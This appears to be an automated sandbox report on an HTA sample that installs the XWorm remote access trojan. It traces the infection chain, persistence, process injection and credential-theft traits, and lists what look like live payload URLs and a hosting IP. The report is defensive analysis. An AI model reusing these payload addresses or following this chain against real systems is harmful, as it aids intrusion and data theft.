              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01020030 GetLocalTime,__swprintf,28_2_01020030
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01020722 GetUserNameW,28_2_01020722
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0101416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,28_2_0101416A
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,15_2_00406805
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Carter.pif PID: 3900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR
              Source: DanielPulse.scrBinary or memory string: WIN_81
              Source: DanielPulse.scrBinary or memory string: WIN_XP
              Source: DanielPulse.scrBinary or memory string: WIN_XPe
              Source: DanielPulse.scrBinary or memory string: WIN_VISTA
              Source: DanielPulse.scrBinary or memory string: WIN_7
              Source: DanielPulse.scrBinary or memory string: WIN_8
              Source: Carter.pif.19.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Carter.pif PID: 3900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0105696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,28_2_0105696E
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01056E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,28_2_01056E32
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,36_2_008A696E
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,36_2_008A6E32

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		2
              Valid Accounts              		11
              Windows Management Instrumentation              		111
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		21
              Input Capture              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		2
              Valid Accounts              		2
              Valid Accounts              		2
              Obfuscated Files or Information              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin Shares21
              Input Capture              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		21
              Access Token Manipulation              		2
              Software Packing              		NTDS29
              System Information Discovery              		Distributed Component Object Model3
              Clipboard Data              		2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell              		2
              Registry Run Keys / Startup Folder              		212
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets41
              Security Software Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job              		111
              Masquerading              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
              Registry Run Keys / Startup Folder              		2
              Valid Accounts              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575551 Sample: c2.hta Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 94 me-work.com 2->94 96 dwLscOsEZmpbOxr.dwLscOsEZmpbOxr 2->96 98 2 other IPs or domains 2->98 116 Multi AV Scanner detection for domain / URL 2->116 118 Suricata IDS alerts for network traffic 2->118 120 Found malware configuration 2->120 122 18 other signatures 2->122 12 mshta.exe 16 2->12         started        16 wscript.exe 2->16         started        19 wscript.exe 2->19         started        signatures3 process4 dnsIp5 100 myguyapp.com 193.26.115.21, 443, 49732, 49734 QUICKPACKETUS Netherlands 12->100 88 C:\Users\user\AppData\Local\Temp\temp.bat, ASCII 12->88 dropped 90 C:\Users\user\AppData\Local\...\c[1].bat, ASCII 12->90 dropped 21 cmd.exe 3 2 12->21         started        24 cmd.exe 12->24         started        102 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->102 26 DanielPulse.scr 16->26         started        28 DanielPulse.scr 19->28         started        file6 signatures7 process8 signatures9 124 Suspicious powershell command line found 21->124 126 Drops PE files with a suspicious file extension 21->126 128 Uses schtasks.exe or at.exe to add and modify task schedules 21->128 30 msword.exe 21->30         started        32 powershell.exe 15 16 21->32         started        36 powershell.exe 21->36         started        42 3 other processes 21->42 38 conhost.exe 24->38         started        40 timeout.exe 24->40         started        process10 file11 44 cmd.exe 30->44         started        74 C:\Users\user\AppData\Local\Temp\f.pdf, PDF 32->74 dropped 104 Drops large PE files 32->104 106 Powershell drops PE file 32->106 76 C:\Users\user\AppData\Local\...\msword.exe, PE32 36->76 dropped 108 Loading BitLocker PowerShell Module 36->108 78 C:\Users\user\AppData\Local\Temp\msword.zip, Zip 42->78 dropped 47 AcroCEF.exe 107 42->47         started        signatures12 process13 file14 86 C:\Users\user\AppData\Local\...\Carter.pif, PE32 44->86 dropped 49 Carter.pif 44->49         started        53 conhost.exe 44->53         started        55 tasklist.exe 44->55         started        59 7 other processes 44->59 57 AcroCEF.exe 47->57         started        process15 file16 80 C:\Users\user\AppData\...\DanielPulse.scr, PE32 49->80 dropped 82 C:\Users\user\AppData\...\DanielPulse.js, ASCII 49->82 dropped 84 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 49->84 dropped 110 Drops PE files with a suspicious file extension 49->110 112 Writes to foreign memory regions 49->112 114 Injects a PE file into a foreign processes 49->114 61 cmd.exe 49->61         started        64 cmd.exe 49->64         started        66 RegAsm.exe 49->66         started        signatures17 process18 file19 92 C:\Users\user\AppData\...\DanielPulse.url, MS 61->92 dropped 68 conhost.exe 61->68         started        70 conhost.exe 64->70         started        72 schtasks.exe 64->72         started        process20

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              c2.hta11%ReversingLabsWin32.Exploit.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\220239\Carter.pif8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\msword\msword.exe8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              me-work.com12%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://myguyapp.com/c.bat0%Avira URL Cloudsafe
              me-work.com0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipJ0%Avira URL Cloudsafe
              https://myguyapp.com/0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zip100%Avira URL Cloudmalware
              https://myguyapp.com/c.batQ;0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROF0%Avira URL Cloudsafe
              https://myguyapp.com/r0%Avira URL Cloudsafe
              https://myguyapp.com/5%VirustotalBrowse
              https://myguyapp.com/msword.zip19%VirustotalBrowse
              https://myguyapp.com/msword.zipurl2=httpd0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf#0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf&0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipurl2=https://myguyappc0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPR0%Avira URL Cloudsafe
              https://myguyapp.com/c.batO0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf60%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf0%Avira URL Cloudsafe
              https://myguyapp.com/c.batA0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfx0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipurl20%Avira URL Cloudsafe
              https://myguyapp.com/c.batta0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              me-work.com
              		193.26.115.21
              		truetrueunknown
              myguyapp.com
              		193.26.115.21
              		truefalse
                		high
                x1.i.lencr.org
                		unknown
                		unknownfalse
                  		high
                  dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://myguyapp.com/msword.ziptrue
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://myguyapp.com/c.battrue
                    • Avira URL Cloud: safe
                    		unknown
                    me-work.comtrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://myguyapp.com/f.pdftrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://myguyapp.com/tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmptrue
                    • 5%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.autoitscript.com/autoit3/Jmsword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000024.00000002.2248424669.00000000008F9000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 00000026.00000000.2341454092.0000000000979000.00000002.00000001.01000000.00000011.sdmp, Carter.pif.19.drfalse
                      		high
                      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.7.drfalse
                        		high
                        https://myguyapp.com/msword.zipJRegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorErrormsword.exe, 0000000F.00000000.2176944096.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.12.drfalse
                          		high
                          https://www.autoitscript.com/autoit3/msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drfalse
                            		high
                            https://myguyapp.com/c.batQ;mshta.exe, 00000000.00000002.2190782363.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031F3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFtasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/rmshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/msword.zipurl2=httpdmsword.exe, 0000000F.00000002.2240642451.0000000000824000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000003.2239272884.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAMRegAsm.exe, 00000028.00000002.4145039589.0000000000DF0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/f.pdf#RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/f.pdf&cmd.exe, 0000001E.00000002.2218183562.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/msword.zipurl2=https://myguyappcCarter.pif, 0000001C.00000002.4142087918.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPRRegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/c.batOmshta.exe, 00000000.00000003.2182996805.000000000A667000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/f.pdf6Carter.pif, 0000001C.00000002.4142975569.00000000011E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://myguyapp.com/c.batAmshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://myguyapp.com/f.pdfxRegAsm.exe, 00000028.00000002.4142044815.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://myguyapp.com/msword.zipurl2tasklist.exe, 00000015.00000003.2198184254.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198325078.0000000003201000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2199134054.0000000003480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198974605.0000000003202000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198290497.00000000031F9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://myguyapp.com/c.battamshta.exe, 00000000.00000003.2182501975.0000000003151000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2190431701.0000000003152000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              193.26.115.21
                              		me-work.comNetherlands
                              		46261QUICKPACKETUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1575551
                              Start date and time:2024-12-16 01:32:05 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 12m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:41
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:c2.hta
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winHTA@70/82@4/1
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
